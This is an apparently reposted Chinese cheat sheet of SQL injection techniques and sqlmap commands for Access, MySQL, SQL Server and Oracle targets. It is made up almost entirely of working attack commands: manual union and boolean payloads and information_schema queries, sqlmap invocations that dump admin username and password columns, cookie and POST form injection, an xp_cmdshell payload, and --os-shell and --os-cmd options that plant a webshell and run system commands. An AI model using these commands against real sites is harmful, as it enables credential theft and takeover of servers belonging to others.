sqlmap使用技巧命令大全

admin 2024年3月21日23:49:18评论9 views字数 3072阅读10分14秒阅读模式

  sqlmap命令大全1:access注入猜解表名   and exists (select * from admin)猜解列名   and exists(select username from admin)常用的表名  admin user news manage a_admin x_admin m_admin adminuser admin_user article_admin administrator manager member memberlist users Manage_User user_info admin_userinfo login new常用的列名  username password id adminusername admin_username adminname admin_name admin adminuser admin_user user_name user_admin administrator administrators adminpassword admin_pwd adminpass userpass user_pass admin_passwod 

sqlmap注入accesssqlmap -u urlsqlmap -u url --tablessqlmap -u url -T 数据库名称 --columnssqlmap -u url -T 数据库名称 -C user,password --dumpMySQL注入1:判断是否存在注入:and 1=1 and 1=22:查询当前页面所链接的数据库列名(前面要报错)  order  by操作系统版本查询 @@version_compile_os版本查询version()查询当前页面所链接的数据库名字database()数据库用户名字user()3:查询表名 1,gooup_concat(table_name)3,4,5,6,...... from information_schema.tables where table_schema=database(转换16进制)查列名1,gooup_concat(column_name)3,4,5,6,...... from information_schema.columns where table_name=表名(转换16进制)4:查询数据:url union select1,2,3........from admin MySQL注入的sqlmap注入:

1:sqlmap.py -u "注入点" 2:sqlmap.py -u "注入点" --dbs(查数据库) 3:sqlmap.py -u "注入点" -D(指定表名)某表名 --tables   (-T是指定数据名)4:sqlmap.py -u "注入点" -D(指定表名) 某表名 -T admin C “username,password” --dump(爆数据)cookie注入和post注入网站传递参数的方式:1:get形式    一般访问网页行为2:cookie形式    伴随着所有访问网页的行为3:post形式    上传文件,登陆cookie形式注入原理就是对get传递来的参数进行了过滤,但是武略了cookie也可以传递参数如何判断cookie注入(传输错如网页拦截之类的)去掉id=xx 查看页面显示是否正常,如果不正常,说明参数在数据传递中是直接起作用的。清空浏览器地址栏,输入Javascript:alert(document.cookie="id"=escape("id参数"))    按回车键后弹出一个对话框,内容是id=xx , 然后用原来的URL刷新页面,如果显示正常,说明应用是request("id")这种方式获取数据的然后重复上面的步骤,讲常规的sql注入语句带入到上面的URL:Javascript:alert(document.cookie="id="+escape("xx 

and 1=1"))Javascript:alert(document.cookie="id="+escape("xx and 1=2"))和常规sql注入一样,如果分别返回正常是不正常,则说明存在注入漏洞,并且可以cookie注入使用常规注入即可用sqlmap进行cookie注入sqlmap.py -u 注入点URL --cookie "id=xx" --level 3sqlmap.py -u url --cookie "id=xx" --level 3 --tables(猜表名)sqlmap.py -u url --cookie "id=xx" --level 3 -T 表名 --coiumnssqlmap.py -u url --cookie "id=xx" --level 3 -T 表名 -C username,password --dumppost注入判断post注入';exec master..xp_cmdshell'iisreset';sqlmap的

三种注入post注入方法1:自动填写表单:sqlmap.py -u URL --forms   直接一路回车sql server 数据库类似于MySQL  sqlmap.py -u URL --forms --dbs(数据库)注意:遇到数据库非常多,而且我们不知道管理账号密码存放在那个数据库中,我们该怎么办?如下:sqlmap.py -u URL --forms --current-db(找当前数据库)找表名:sqlmap.py -u URL --forms -D 数据库名称 --tables(猜解他数据库下的表名)找列名:sqlmap.py -u URL --forms -D 数据库名称 -T 表名 --columns爆数据:sqlmap.py -u URL --forms -D 数据库名称 -T 表名 -C username,password --dump2:sqlmap结合burpsuite注入抓包sqlmap检测:sqlmap.py -r burpsuite抓包.txt3:指定表单注入burpsuite截包sqlmap.py -u URL  --data “username=a&password=a”4:oracle注入sqlmap交互式交互式执行cmd命令:sqlmap.py -u URL --os-cmd=命令交互式写入shell:sqlmap.py -u URL --os-shell 里面也可以执行cmd命令在根目录下生成两个文件:tmpbxbxz.php 和tmpuoiuz.php交互式执行sql命令:sqlmap.py -u URL --sql-shell  执行命令sql命令getshell伪静态的注入:sqlmap -u URL --dbs延时注入:sqlmap.py -u URL --technique -T --current-user数字型,字符型,搜索型注入数字型:select*from admin where id=$id字符型:select*from admin where uid='$uid'搜索性:select*from admin where pid like'%$pid%'order by pid注入方法:闭合注入,字符型闭合注入手法:'and'1'='1形成的SQL语句:select*from admin where uid='$xx'and'1'='1'select*from admin where uid='$xx'and'1'='2'注入方法'语句 and'1'='1 搜索型注入方法:%'and'%1%'=%1%'语句 and'%1%'=%1注释法直接 order by 报错注释order by 1----(2个斜杠是php注释的意思)

原文始发于微信公众号(渗透测试 网络安全技术学习):sqlmap使用技巧命令大全

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月21日23:49:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   sqlmap使用技巧命令大全https://cn-sec.com/archives/2593892.html

发表评论

匿名网友 填写信息